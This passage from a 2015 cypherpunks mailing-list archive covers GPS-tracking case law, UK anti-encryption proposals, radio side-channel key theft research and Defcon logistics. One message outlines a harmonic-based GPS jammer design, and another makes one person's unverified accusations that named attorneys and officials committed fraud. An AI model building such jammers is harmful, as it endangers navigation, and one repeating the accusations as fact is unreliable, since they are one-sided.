'probable cause' nor 'reasonable suspicion' to do so. To conceal that, they obtained the warrant, making it appear that the GPS surveillance started in October 2000. This was fraud, because in order to obtain a warrant, they have to explain WHY they need the GPS device installed. Clearly, since a GPS device was already installed in the car, there was no need to place one. THAT misrepresented the need to the judge. > > You might ask, "Jim, why didn't you complain about this during the trial". As you might know, I was given a long series of lawyers who, rather than being the first line of defense for me, were actually the first line of OFFENCE for the government. What the average person doesn't understand is that a defense attorney, colluding with the government, has virtually unlimited power to sabotage his client's case, and that was precisely what happened to me. The crooked attorney was Robert Leen. > > And it turned out that the government had a powerful motivation, or at least some of its employees: They had faked an 'appeal' case in the 9th Circuit, 99-30210, forging at least two filings as if I had done them 'pro se', as if I was bring that case. I did not, and I wasn't aware of the pre-May 2000 existence of that faked case until June 2003, when I first saw that case's docket. The crooked attorney who concealed this from me was Jonathan Solovy. > Jim Bell > > > > > > > > > > > > > > > > > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 14600 bytes Desc: not available URL: From jya at pipeline.com Sun Jul 12 13:51:55 2015 From: jya at pipeline.com (John Young) Date: Sun, 12 Jul 2015 16:51:55 -0400 Subject: progression of technologies In-Reply-To: <506884227.816875.1436727195214.JavaMail.yahoo@mail.yahoo.c om> References: <506884227.816875.1436727195214.JavaMail.yahoo@mail.yahoo.com> Message-ID: Jim aptly notes the cheating use of technology and law, practiced by lawyers and technologists, prosecution and defense, hardly limited to millions of secretkeepers, litigous-technologicus ubquitious, so to paraphrase Dr. Geer, we are all corner cutting opportunists, highly trained and credentialed dual hatted techno-legalistic tricksters now. Once IANAL prevailed, now IAATLT. At 02:53 PM 7/12/2015, you wrote: >From: Tom Ritter >On 10 July 2015 at 10:58, <dan at geer.org> wrote: > >> Well, now we are into dueling Supreme Court cases; see > >> > >> > http://caselaw.findlaw.com/us-supreme-court/533/27.html > >> Kyllo v. United States (2001) > >> Despite the Court's attempt to draw a line that is "not only > >> firm but also bright," ante, at 12, the contours of its new rule > >> are uncertain because its protection apparently dissipates as > >> soon as the relevant technology is "in general public use," ante, > >> at 6-7. Yet how much use is general public use is not even hinted > >> at by the Court's opinion, which makes the somewhat doubtful > >> assumption that the thermal imager used in this case does not > >> satisfy that criterion. In any event, putting aside its lack > >> of clarity, this criterion is somewhat perverse because it seems > >> likely that the threat to privacy will grow, rather than recede, > >> as the use of intrusive equipment becomes more readily available. > > >Yes! That's the case I was obliquely referring to. Sorry, I kind of > >glazed over that part of your argument in the article. > > > That reads, to me, that what the public adopts limits what I can > > do or expect. > > >I guess where we quibble is I'm skeptical that the general public (as > >defined by the courts?) will (ever?) adopt the types of tools you > >refer to (uniquely identifying individuals based on electromagnetics, > >tracking tire pressure sensors.) I don't think the 'general public' > >has adopted thermal imagers. These will make their way into > >industry... (advertisers tracking WiFi probes in malls obviously). > >Months ago, FLIR announced an IR-imaging add-on for IPhones, which >is tiny. However, just a month or two ago I saw a media reference >to a (very tiny) T-shaped device, intended to plug into the >micro-USB jack of a cell phone, that did IR imaging. As I recall, >very economical, but even then the majority of the population won't >buy, simply because they have no need for such a thing most of the time. > > > > > > >So my wonder now is if industry adopting a technology is sufficient > >for the courts to qualify as 'general public'. But this, at best, only > >affects exotic technology. We're already fighting this battle. > > >Automated license plate readers have never (?) been challenged > >(successfully?). They are an extension of "a police officer just > >watching a highway" which is legal. And the courts like extensions of > >things that are already done - see bulk collection of metadata! > > >This 'extension' principle doesn't always work. In 2012, the >Supreme Court ruled (US v. Jones) >https://www.law.cornell.edu/wex/united_states_v._jones_%282012%29 >that police could not place a GPS tracking device on a car without a >warrant. One argument that has been rejected in lower-court cases >was the idea that in principle, a car's movements could be tracked >with an army of police, one per street corner, so that a GPS >tracking bug simply automated that process. One problem that >argument is that society not only doesn't have the resources to >accomplish such a blanket coverage of an area, and that even if >practical, society may not necessarily want such an intrusive system to exist. > >This issue was (secretly) quite relevant to me. Federal authorities >apparently installed a tracking device on a car I used, probably in >about April 2000, without a warrant. Presumably, if challenged they >would have been claiming to follow a 9th Circuit Court of Appeals >decision from 1999, U.S. v. McIver, which had allowed the placement >of a GPS tracking device on a truck seen at the location of a >marijuana growing operation. The problem with this justification, >however, is that at least in McIver, there was an actual crime >involved, and the truck was plausibly involved in that crime. In my >case, after my release from prison in April 2000, nobody alleged >that I was engaging in any crime. The McIver case didn't rule that >police could simply choose to place a GPS tracking device on ANY >car, for no reason, and even without 'probable cause' or 'reasonable >suspicion'. > >What was particularly devious (and I call illegal) was that later, >probably in October 2000, the Feds actually obtained a warrant for >the placement of ANOTHER tracking device on the same car (which, of >course, may have ended up being the same device!) WITHOUT telling >the judge that a tracking device was already on the car, and had >been so since at least as early as April 2000. Why the >subterfuge? They later used the result of the tracking device (at >least, the portion taken after the October warrant) against me in >court. But they continued to conceal the fact that a GPS device had >been placed since perhaps April 2000. Presumably, they concealed >that because they would have had to explain, in court, why they were >tracking me, without a warrant, and despite the fact that they had >no 'probable cause' nor 'reasonable suspicion' to do so. To conceal >that, they obtained the warrant, making it appear that the GPS >surveillance started in October 2000. This was fraud, because in >order to obtain a warrant, they have to explain WHY they need the >GPS device installed. Clearly, since a GPS device was already >installed in the car, there was no need to place one. THAT >misrepresented the need to the judge. > >You might ask, "Jim, why didn't you complain about this during the >trial". As you might know, I was given a long series of lawyers >who, rather than being the first line of defense for me, were >actually the first line of OFFENCE for the government. What the >average person doesn't understand is that a defense attorney, >colluding with the government, has virtually unlimited power to >sabotage his client's case, and that was precisely what happened to >me. The crooked attorney was Robert Leen. > >And it turned out that the government had a powerful motivation, or >at least some of its employees: They had faked an 'appeal' case in >the 9th Circuit, 99-30210, forging at least two filings as if I had >done them 'pro se', as if I was bring that case. I did not, and I >wasn't aware of the pre-May 2000 existence of that faked case until >June 2003, when I first saw that case's docket. The crooked >attorney who concealed this from me was Jonathan Solovy. > Jim Bell > > > > > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7870 bytes Desc: not available URL: From grarpamp at gmail.com Sun Jul 12 15:16:30 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 12 Jul 2015 18:16:30 -0400 Subject: FOIPA adventures In-Reply-To: References: Message-ID: On Sun, Jul 12, 2015 at 3:33 AM, coderman wrote: > ready to spend a fortune to see this through. http://yro.slashdot.org/story/15/07/12/1449252/making-foia-requested-data-public-too-much-transparency-for-journalists > FOIA processing notes associated with requests #1331086-000, > #1331360-000, #1331082-000. Please include processing notes for this > request, even if request is denied in part. Please identify > individuals responsible for any aspect of FOIA processing in the > processing notes, along with explanation of their involvement if not > typically assigned FOIA responsibilities for the record systems above. lol. From grarpamp at gmail.com Sun Jul 12 15:23:27 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 12 Jul 2015 18:23:27 -0400 Subject: UK Snoopers Charter could ban End to End Crypto Message-ID: http://www.ibtimes.com.au/uks-snoopers-charter-ban-whatsapp-imessage-snapchat-1455452 WhatsApp is facing banning in the UK in the coming weeks. Prime Minister David Cameron is looking at a new legislation that could see the social media and online messaging services including Snapchat, Facebook Messenger and iMessage illegal in the country... From grarpamp at gmail.com Sun Jul 12 15:42:51 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 12 Jul 2015 18:42:51 -0400 Subject: Fwd: [Cryptography] Ad hoc "exceptional access" discussion at Crypto'15 ? In-Reply-To: <20150712151653.GH16799@yeono.kjorling.se> References: <55A1CEC6.2070404@m-o-o-t.org> <20150712151653.GH16799@yeono.kjorling.se> Message-ID: ---------- Forwarded message ---------- From: Michael Kjörling Date: Sun, Jul 12, 2015 at 11:16 AM Subject: Re: [Cryptography] Ad hoc "exceptional access" discussion at Crypto'15 ? To: cryptography at metzdowd.com On 11 Jul 2015 21:36 -0700, from hbaker1 at pipeline.com (Henry Baker): > "Exceptional access" is the term used in the recent MIT "Keys under > Doormats" report. One reason for a discussion session is to come up > with better arguments to explain to non-tekkies what the issues are, > and why the FBI should be careful what it wishes for. There's always the possibility of just asking said non-tekkies: - If the government can't keep their secrets safe (even ignoring various insider attacks like Manning or Snowden, let alone that which happens at the hands of disgruntled law enforcement officers or curious medical practitioners; see e.g. the recent US _Office of Personnel Management_ breach, or the illicit telephone wiretapping mess in Greece a few years ago which AFAIK hasn't ever been attributed to anyone), - If the companies that make software designed to allow spying on people can't maintain security (see e.g. the recent _Hacking Team_ episode), - If large multinational corporations can't maintain security (see e.g. the recent _Sony_ episode), - _Then why_ should we trust any of those to, in addition to their own secrets, keep _our_ secrets safe? Why should _I_ trust them to keep _my_ secrets safe? I obviously might not be able to do _better_ (and frankly, am unlikely to be able to do significantly better) than any of the above, but at least I'm not creating an _additional_ extreme-value-target treasure trove which I then fail to adequately protect. I sometimes compare data encryption to locking your house. (Most people accept that, even though they aren't doing anything illicit in their homes, they don't want strangers rummaging through their belongings.) In that comparison, "exceptional access" would be a sort of global master key that allows trivial unlocking of _any_ locked door, in such a way that does not trigger any alarm system or anything else similar that the home owner might have installed. -- Michael Kjörling • https://michael.kjorling.se • michael at kjorling.se OpenPGP B501AC6429EF4514 https://michael.kjorling.se/public-keys/pgp “People who think they know everything really annoy those of us who know we don’t.” (Bjarne Stroustrup) _______________________________________________ The cryptography mailing list cryptography at metzdowd.com http://www.metzdowd.com/mailman/listinfo/cryptography From jdb10987 at yahoo.com Sun Jul 12 11:53:15 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sun, 12 Jul 2015 18:53:15 +0000 (UTC) Subject: progression of technologies In-Reply-To: References: Message-ID: <506884227.816875.1436727195214.JavaMail.yahoo@mail.yahoo.com> From: Tom Ritter On 10 July 2015 at 10:58,  wrote: >> Well, now we are into dueling Supreme Court cases; see >> >> http://caselaw.findlaw.com/us-supreme-court/533/27.html >>    Kyllo v. United States (2001) >>    Despite the Court's attempt to draw a line that is "not only >>    firm but also bright," ante, at 12, the contours of its new rule >>    are uncertain because its protection apparently dissipates as >>    soon as the relevant technology is "in general public use," ante, >>    at 6-7. Yet how much use is general public use is not even hinted >>    at by the Court's opinion, which makes the somewhat doubtful >>    assumption that the thermal imager used in this case does not >>    satisfy that criterion. In any event, putting aside its lack >>    of clarity, this criterion is somewhat perverse because it seems >>    likely that the threat to privacy will grow, rather than recede, >>    as the use of intrusive equipment becomes more readily available. >Yes! That's the case I was obliquely referring to. Sorry, I kind of >glazed over that part of your argument in the article. > That reads, to me, that what the public adopts limits what I can > do or expect. >I guess where we quibble is I'm skeptical that the general public (as >defined by the courts?) will (ever?) adopt the types of tools you >refer to (uniquely identifying individuals based on electromagnetics, >tracking tire pressure sensors.)  I don't think the 'general public' >has adopted thermal imagers.  These will make their way into >industry... (advertisers tracking WiFi probes in malls obviously). Months ago, FLIR announced an IR-imaging add-on for IPhones, which is tiny.  However, just a month or two ago I saw a media reference to a (very tiny) T-shaped device, intended to plug into the micro-USB jack of a cell phone, that did IR imaging.  As I recall, very economical, but even then the majority of the population won't buy, simply because they have no need for such a thing most of the time. >So my wonder now is if industry adopting a technology is sufficient >for the courts to qualify as 'general public'. But this, at best, only >affects exotic technology.  We're already fighting this battle. >Automated license plate readers have never (?) been challenged >(successfully?). They are an extension of "a police officer just >watching a highway" which is legal.  And the courts like extensions of >things that are already done - see bulk collection of metadata! This 'extension' principle doesn't always work.  In 2012, the Supreme Court ruled (US v. Jones) https://www.law.cornell.edu/wex/united_states_v._jones_%282012%29  that police could not place a GPS tracking device on a car without a warrant.  One argument that has been rejected in lower-court cases was the idea that in principle, a car's movements could be tracked with an army of police, one per street corner, so that a GPS tracking bug simply automated that process.  One problem that argument is that society not only doesn't have the resources to accomplish such a blanket coverage of an area, and that even if practical, society may not necessarily want such an intrusive system to exist. This issue was (secretly) quite relevant to me.  Federal authorities apparently installed a tracking device on a car I used, probably in about April 2000, without a warrant.  Presumably, if challenged they would have been claiming to follow a 9th Circuit Court of Appeals decision from 1999,  U.S. v. McIver, which had allowed the placement of a GPS tracking device on a truck seen at the location of a marijuana growing operation.  The problem with this justification, however, is that at least in McIver, there was an actual crime involved, and the truck was plausibly involved in that crime.  In my case, after my release from prison in April 2000, nobody alleged that I was engaging in any crime.  The McIver case didn't rule that police could simply choose to place a GPS tracking device on ANY car, for no reason, and even without 'probable cause' or 'reasonable suspicion'. What was particularly devious (and I call illegal) was that later, probably in October 2000, the Feds actually obtained a warrant for the placement of ANOTHER tracking device on the same car (which, of course, may have ended up being the same device!) WITHOUT telling the judge that a tracking device was already on the car, and had been so since at least as early as April 2000.  Why the subterfuge?  They later used the result of the tracking device (at least, the portion taken after the October warrant) against me in court.  But they continued to conceal the fact that a GPS device had been placed since perhaps April 2000.  Presumably, they concealed that because they would have had to explain, in court, why they were tracking me, without a warrant, and despite the fact that they had no 'probable cause' nor 'reasonable suspicion' to do so.  To conceal that, they obtained the warrant, making it appear that the GPS surveillance started in October 2000.  This was fraud, because in order to obtain a warrant, they have to explain WHY they need the GPS device installed.  Clearly, since a GPS device was already installed in the car, there was no need to place one.  THAT misrepresented the need to the judge. You might ask, "Jim, why didn't you complain about this during the trial".  As you might know, I was given a long series of lawyers who, rather than being the first line of defense for me, were actually the first line of OFFENCE for the government.  What the average person doesn't understand is that a defense attorney, colluding with the government, has virtually unlimited power to sabotage his client's case, and that was precisely what happened to me.  The crooked attorney was Robert Leen. And it turned out that the government had a powerful motivation, or at least some of its employees:  They had faked an 'appeal' case in the 9th Circuit, 99-30210, forging at least two filings as if I had done them 'pro se', as if I was bring that case.  I did not, and I wasn't aware of the pre-May 2000 existence of that faked case until June 2003, when I first saw that case's docket.  The crooked attorney who concealed this from me was Jonathan Solovy.             Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 13521 bytes Desc: not available URL: From jdb10987 at yahoo.com Sun Jul 12 14:53:05 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sun, 12 Jul 2015 21:53:05 +0000 (UTC) Subject: progression of technologies In-Reply-To: References: Message-ID: <321678489.847221.1436737985325.JavaMail.yahoo@mail.yahoo.com> From: "wirelesswarrior at Safe-mail.net" -------- Original Message -------- From: jim bell Apparently from: cypherpunks-bounces at cpunks.org To: Tom Ritter , "dan at geer.org" Cc: cpunks >It would seem that a GPS jammer keyfob, that could be turned off when desired, would do the trick. The GPS >signal at ground level is very weak and only works due to a huge process gain. Narrowband jamming will >desensitize the closeby tracker's front end easily countering that process gain without jamming more distanrt >GPS receivers. Building such a jammer from cheap and available components should be easy. Yes, jamming ordinary (non-military) GPS would be easy.  The two frequencies involved are: 1.57542 GHz (L1 signal) and 1.2276 GHz (L2 signal).  (The former is the civilian signal; the latter is the military signal.)  The system uses spread-spectrum techniques, but even these can be defeated readily with only very tiny amounts of power.  The ERP (effective radiated power) of the L1 signal is about 250 watts (meaning that the signal is equivalent to an isotropic, or non-directional, radiator emitting 250 watts.)  Due to the inverse-square law, the emissions at 20,200 km altitude are equivalent a signal a trillion times (120 decibels) weaker at a distance of 20,200,000/1,000,000 or 20.2 meters away:  A signal 250 watts/1 trillion is 0.25 nanowatts.  I don't know offhand what the spread-spectrum advantage of the system is, but a nearby signal of 1 microwatt would probably obliterate any received signal.  You will notice that the ratio of the two frequencies, L1 and L2, is very close (about 0.19% difference) to 9:7, being two odd numbers.  This is quite convenient.  What would be needed is a square wave oscillator at a frequency of 1.57542 GHz/9, or  175.04666 Mhz.  This signal, filtered to remove signal much below 1.2 GHz, will emit harmonics at both the L1 and L2 signals.  It's not going to be an especially 'clean' jammer, having spurs also at the 3rd harmonic of 175.04666 MHz as well as the fifth harmonic, as well as the odd harmonics above the 9th.  Making the 175 MHz squarewave would be a simple matter, using a PLL (Phase Lock Loop) frequency multiplier and a lower-frequency crystal.  I think there are probably programmable-frequency oscillators on the market too, although I haven't looked into that in many years.           Jim Bell, N7IJS.   "The LAST 'Tech-plus' ham in the world" -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4461 bytes Desc: not available URL: From afalex169 at gmail.com Sun Jul 12 21:19:47 2015 From: afalex169 at gmail.com (=?UTF-8?B?INCQ0LvQtdC60YHQsNC90LTRgCA=?=) Date: Mon, 13 Jul 2015 07:19:47 +0300 Subject: UK Snoopers Charter could ban End to End Crypto In-Reply-To: References: Message-ID: Oh, what a wonderful democracy we've got. This is madness! And if it wont happen in the coming weeks, it will eventually happen. Not only in the UK. Too much is at stake and nobody is going to move backwards. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 669 bytes Desc: not available URL: From grarpamp at gmail.com Mon Jul 13 08:14:40 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 13 Jul 2015 11:14:40 -0400 Subject: Stealing Keys from PCs using a Radio Message-ID: http://www.tau.ac.il/~tromer/radioexp/ We demonstrate the extraction of secret decryption keys from laptop computers, by nonintrusively measuring electromagnetic emanations for a few seconds from a distance of 50 cm. The attack can be executed using cheap and readily-available equipment: a consumer-grade radio receiver or a Software Defined Radio USB dongle. The setup is compact and can operate untethered; it can be easily concealed, e.g., inside pita bread. Perhaps someday extensible to coffeeshop pretext: "hey, can you help me test my bitcoin, let's swap a satoshi..." From drwho at virtadpt.net Mon Jul 13 11:44:43 2015 From: drwho at virtadpt.net (The Doctor) Date: Mon, 13 Jul 2015 11:44:43 -0700 Subject: Executive Director Needed, Tor Project In-Reply-To: <90b7e493c2083965919e8fb549c3b016@cryptolab.net> References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> <90b7e493c2083965919e8fb549c3b016@cryptolab.net> Message-ID: <55A4071B.6040304@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/11/2015 06:44 PM, Griffin Boyce wrote: > Whoa whoa whoa. We all know that Vermin Supreme is the community > favorite to become the next Tor E.D. Juan's got no chance. You mean that Adam Weishaupt dropped out of the running? Shame, that. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Disclaimer: Speaking only for myself and not my breakfast cereal. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVpAcXAAoJED1np1pUQ8RkDw4P/i0YUVytn/A54rLIvMIj1zpx /MtGITMP1Pmpr6d66Dh87LocgafL3Oi6svc7GyHnfM6rOqrIQgznGwN4inzhrSK0 uKjuWeoJRumGMvF0qQnWRlDy2Z7ivLeK0JM5UlTjk8iS2qcctze6uHM3ZsgfuGvl nSCKE6FHuq+Mmxh+3ykd7PtiTjP0Vs7JFCXWBDJDIN96ziKohv4/ovPeT+UkRlMu WeGh9aWHh0yS+7dlDN/yT1rZAaEa428kvqXCrWihsMgXno1LPYV6eFx5xyn9oBOT JBjkX1Y8+s4vljQf0yWzEkGLRs4X/Z8tkYT+aKfNOm0KcZO2OF9JifGsWIIbjLEr To+CKgvJHubJA9rS8ZIUZZIKmg7Qe4ewwkxJsfuWKF39zEAf2T0idIyLfpsWioWc VUpPAxd13ZGuCBxb7s+Dflufh/1nztVTOIURHm1JwgCZqV9HY9TpZAZeADPav+GX gjo29RfsFhziuaS5Fdw9RyPEhfdQFg8C0OU4Yubj3Coah8d85Z256sRxsKMZVZ+R iG0lyYjZEIbJ/Ys8i1znfUtw0F4x7IZ0Y8ps4zf9Llx6b2R3BNUey6KH4dmwpCln mzSRPNVXA/VBRYI7HmA3a1T8GygE1wT68n3gsuSKwEnYHEIH2gxDrNlQdCzOxahK ETGOsC/fDBTHxce1qSS+ =bgMN -----END PGP SIGNATURE----- From griffin at cryptolab.net Mon Jul 13 12:13:24 2015 From: griffin at cryptolab.net (Griffin Boyce) Date: Mon, 13 Jul 2015 15:13:24 -0400 Subject: Executive Director Needed, Tor Project In-Reply-To: <55A4071B.6040304@virtadpt.net> References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> <90b7e493c2083965919e8fb549c3b016@cryptolab.net> <55A4071B.6040304@virtadpt.net> Message-ID: The Doctor wrote: > Griffin Boyce wrote: > >> Whoa whoa whoa. We all know that Vermin Supreme is the community >> favorite to become the next Tor E.D. Juan's got no chance. > > You mean that Adam Weishaupt dropped out of the running? Shame, that. ^ ▲ illuminati confirmed From grarpamp at gmail.com Mon Jul 13 14:35:54 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 13 Jul 2015 17:35:54 -0400 Subject: Defcon In-Reply-To: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> References: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Mon, Jul 13, 2015 at 5:20 PM, jim bell wrote: > Someone just reminded me that I have never attended Defcon, and one is > coming very soon. > it would help if I could stay with a small group that already had lodging and local transportation. Dude, will somebody please comp this guy :) From grarpamp at gmail.com Mon Jul 13 15:51:11 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 13 Jul 2015 18:51:11 -0400 Subject: Stop Selling Your Children To Bankers... Molyneux, Greece, Bitcoin... Message-ID: http://www.reddit.com/r/Bitcoin/comments/3d4dz1/the_eu_just_told_greece_give_us_50_billion_of/ http://www.reddit.com/r/Bitcoin/comments/3d4wed/stop_selling_your_children_to_bankers_stefan/ http://www.reddit.com/r/Bitcoin/comments/3d4gbu/no_we_dont_we_dont_owe_you_anything/ https://www.youtube.com/results?search_query=molyneux+bitcoin On hidden dangers of Bitcoin... "At some point there is going to be a conflict of biblical proportions..." -- Molyneux From jdb10987 at yahoo.com Mon Jul 13 12:36:48 2015 From: jdb10987 at yahoo.com (jim bell) Date: Mon, 13 Jul 2015 19:36:48 +0000 (UTC) Subject: Stealing Keys from PCs using a Radio In-Reply-To: References: Message-ID: <1156080481.1573635.1436816208329.JavaMail.yahoo@mail.yahoo.com> From: grarpamp Subject: Stealing Keys from PCs using a Radio Even  in 1977, when I had just built my 'Dyna Micro' https://en.wikipedia.org/wiki/Single-board_computer  microprocessor trainer board, I could tell that its emanations on the AM radio band were were quite distinctive:  I could monitor the progress of programs merely by listening to an otherwise-unoccupied AM frequency.  While I wasn't particularly interested in the details at that time,  it has long been obvious that a program could be written to emit specific data, perhaps by repeating segments of code based on the information to be transmitted.               Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1966 bytes Desc: not available URL: From alfonso.degregorio at gmail.com Mon Jul 13 14:02:16 2015 From: alfonso.degregorio at gmail.com (Alfonso De Gregorio) Date: Mon, 13 Jul 2015 21:02:16 +0000 Subject: Stealing Keys from PCs using a Radio In-Reply-To: <1156080481.1573635.1436816208329.JavaMail.yahoo@mail.yahoo.com> References: <1156080481.1573635.1436816208329.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Mon, Jul 13, 2015 at 7:36 PM, jim bell wrote: > From: grarpamp > > Subject: Stealing Keys from PCs using a Radio > > > Even in 1977, when I had just built my 'Dyna Micro' > https://en.wikipedia.org/wiki/Single-board_computer microprocessor trainer > board, I could tell that its emanations on the AM radio band were were quite > distinctive: I could monitor the progress of programs merely by listening > to an otherwise-unoccupied AM frequency. While I wasn't particularly > interested in the details at that time, it has long been obvious that a > program could be written to emit specific data, perhaps by repeating > segments of code based on the information to be transmitted. > Jim Bell > While I was not born yet back then, less than twenty years later I built such program, playing with control messages sent from the host to the AT keyboard. Alfonso From jdb10987 at yahoo.com Mon Jul 13 14:20:30 2015 From: jdb10987 at yahoo.com (jim bell) Date: Mon, 13 Jul 2015 21:20:30 +0000 (UTC) Subject: Defcon Message-ID: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Someone just reminded me that I have never attended Defcon, and one is coming very soon.  I'd go, if I could arrange to do so ECONOMICALLY.  Already found some good deals on travel, but one person staying alone in Las Vegas isn't particularly cheap.  My standards are very low, but it would help if I could stay with a small group that already had lodging and local transportation.   I would contribute towards the cost.          Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 733 bytes Desc: not available URL: From list at sysfu.com Mon Jul 13 21:44:31 2015 From: list at sysfu.com (Seth) Date: Mon, 13 Jul 2015 21:44:31 -0700 Subject: Defcon In-Reply-To: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> References: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Mon, 13 Jul 2015 14:20:30 -0700, jim bell wrote: > Someone just reminded me that I have never attended Defcon, and one is > coming very soon. I'd go, if I could arrange to do so ECONOMICALLY. > Already found some good deals on travel, but one person staying alone > in Las Vegas isn't particularly cheap. My standards are very low, but > it would help if I could stay with a small group that already had > lodging and local transportation. I would contribute towards the > cost. Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: lodging.jpg Type: image/jpeg Size: 74613 bytes Desc: not available URL: From grarpamp at gmail.com Mon Jul 13 19:07:57 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 13 Jul 2015 22:07:57 -0400 Subject: Encryption Rights - A Google+ community Message-ID: https://plus.google.com/communities/109624826715876091211 Encryption Rights - Protecting Our Rights to Strongly Encrypt By Lauren Weinstein http://www.vortex.com/lauren From jason.mcvetta at gmail.com Mon Jul 13 23:04:52 2015 From: jason.mcvetta at gmail.com (Jason McVetta) Date: Mon, 13 Jul 2015 23:04:52 -0700 Subject: Defcon In-Reply-To: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> References: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Message-ID: Rent a furnished tourist apartment a little off the Strip. Stay a week for the price of one day in a hotel. https://lasvegas.craigslist.org/search/apa?max_price=500&query=furnished&min_price=100 -- sent from my robot On Jul 14, 2015 4:25 AM, "jim bell" wrote: > Someone just reminded me that I have never attended Defcon, and one is > coming very soon. I'd go, if I could arrange to do so ECONOMICALLY. > Already found some good deals on travel, but one person staying alone in > Las Vegas isn't particularly cheap. My standards are very low, but it > would help if I could stay with a small group that already had lodging and > local transportation. I would contribute towards the cost. > Jim Bell > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1284 bytes Desc: not available URL: From shelley at misanthropia.org Tue Jul 14 02:45:39 2015 From: shelley at misanthropia.org (Shelley) Date: Tue, 14 Jul 2015 02:45:39 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: <20150714090319.GG6906@ctrlc.hu> References: <20150714090319.GG6906@ctrlc.hu> Message-ID: <20150714094523.637C2C00027@frontend1.nyi.internal> On July 14, 2015 2:11:35 AM stef wrote: > On Mon, Jul 13, 2015 at 10:07:57PM -0400, grarpamp wrote: > > https://plus.google.com/communities/109624826715876091211 > > Encryption Rights - Protecting Our Rights to Strongly Encrypt > > By Lauren Weinstein > > http://www.vortex.com/lauren > > but wtf in the middle of the kraakens tentacles? wth do people still trust > google? even laura. wtf? the mind boggles. > > -- I'm glad it's not just me! That was my reaction too but I held back from commenting, because I feel like I'm always bitching here about cpunks or anyone interested in privacy still using google for any reason. I don't understand it. -S From softservant at gmail.com Tue Jul 14 09:38:05 2015 From: softservant at gmail.com (Softy) Date: Tue, 14 Jul 2015 09:38:05 -0700 Subject: =?UTF-8?B?4oCLUmU6IERlZmNvbg==?= Message-ID: ​and here I was not suggesting CouchSurfing.com because I thought that would be too obvious.​ This list is nothing but stating the obvious sometimes. Surprising how often that still presents a novelty view/info. > Rent a furnished tourist apartment a little off the Strip. Stay a week for > the price of one day in a hotel. > > > https://lasvegas.craigslist.org/search/apa?max_price=500&query=furnished&min_price=100 > > -- sent from my robot > On Jul 14, 2015 4:25 AM, "jim bell" wrote: > > > Someone just reminded me that I have never attended Defcon, and one is > > coming very soon. I'd go, if I could arrange to do so ECONOMICALLY. > > Already found some good deals on travel, but one person staying alone in > > Las Vegas isn't particularly cheap. My standards are very low, but it > > would help if I could stay with a small group that already had lodging > and > > local transportation. I would contribute towards the cost. > > Jim Bell > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1774 bytes Desc: not available URL: From shelley at misanthropia.org Tue Jul 14 09:58:30 2015 From: shelley at misanthropia.org (Shelley) Date: Tue, 14 Jul 2015 09:58:30 -0700 Subject: =?UTF-8?B?UmU6IOKAi1JlOiBEZWZjb24=?= In-Reply-To: References: Message-ID: <20150714165814.17B44680232@frontend2.nyi.internal> On July 14, 2015 9:43:54 AM Softy wrote: > ​and here I was not suggesting CouchSurfing.com because I thought that > would be too obvious.​ This list is nothing but stating the obvious > sometimes. Surprising how often that still presents a novelty view/info. C'mon, I *know* one of you got the early convention rate and have an extra bed. I had to let mine go a month ago when I found out I couldn't go this year, or else I'd make the offer. Jim also is going to need a primer on going for the first time. We can't have him accidentally end up on the wall of sheep! -S > > Rent a furnished tourist apartment a little off the Strip. Stay a week for > > the price of one day in a hotel. > > > > > > > https://lasvegas.craigslist.org/search/apa?max_price=500&query=furnished&min_price=100 > > > > -- sent from my robot > > On Jul 14, 2015 4:25 AM, "jim bell" wrote: > > > > > Someone just reminded me that I have never attended Defcon, and one is > > > coming very soon. I'd go, if I could arrange to do so ECONOMICALLY. > > > Already found some good deals on travel, but one person staying alone in > > > Las Vegas isn't particularly cheap. My standards are very low, but it > > > would help if I could stay with a small group that already had lodging > > and > > > local transportation. I would contribute towards the cost. > > > Jim Bell > > From sdw at lig.net Tue Jul 14 10:02:31 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 14 Jul 2015 10:02:31 -0700 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <55A540A7.6080808@lig.net> Everything will be run in the cloud and browser because it is, overall, a better computation model. However, that doesn't preclude you from running a cloud locally. Although pretty much proprietary to Google & Amazon until recently, Docker et al and related 